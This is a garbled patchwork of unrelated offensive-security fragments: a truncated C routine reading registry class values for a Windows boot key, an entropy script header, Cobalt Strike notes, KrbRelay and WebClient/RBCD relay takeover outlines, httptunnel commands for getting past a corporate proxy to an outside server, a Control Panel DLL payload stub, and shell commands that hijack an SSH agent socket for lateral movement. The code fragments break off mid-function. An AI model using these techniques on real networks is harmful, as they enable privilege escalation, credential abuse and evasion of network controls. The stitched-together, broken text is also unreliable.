#include <windows.h>
#include <stdio.h>
#define BOOT_KEY_SIZE 16
#pragma warning(disable: 4996)
void getRegistryClassValue(HKEY rootKey, const char* subKey, char* classValue, DWORD classValueSize) {
    HKEY hKey;
    LONG result = RegOpenKeyExA(rootKey, subKey, 0, KEY_READ, &hKey);
    if (result != ERROR_SUCCESS) {
        fprintf(stderr, "Error opening registry key: %ld\n", result);
'''
Shannon-Entropy.py
Determine the Shannon entropy of any file - value output between 0 (ordered) and 8 (fully random)
Optionally add the `-pe` argument to parse the headers of a PE file and determine the entropy of each section
'''
import sys, os
import argparse
import math
import pefile
MANUAL COBALT STRIKE
----- Standard Commands -----
Creating a payload
Attacks -> Packages ->
interact - choose an agent
help -> will show a list of commands
help [command] - will show help for a specific command
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-privileged domain user to local system on domain-joined computers.
Prerequisites:
- LDAP signing not required on Domain Controller (default!)
# Client (Cygwin)
lynx -source rawgit.com/transcode-open/apt-cyg/master/apt-cyg > apt-cyg
install apt-cyg /bin
apt-cyg install httptunnel
htc -P $CORP_HTTP_PROXY_HOST:$CORP_HTTP_PROXY_PORT -F 8888 $HTS_SERVER_HOST:80
ssh -p 8888 $USER@localhost
In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"
#include <Windows.h>
extern "C" __declspec(dllexport) LONG CplApplet()
{
    MessageBoxA(NULL, "Replace this message box with something more interesting...", "Control Panel", 0);
    return 1;
}
Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld
user@internal:~$ hostname -f
internal.company.tld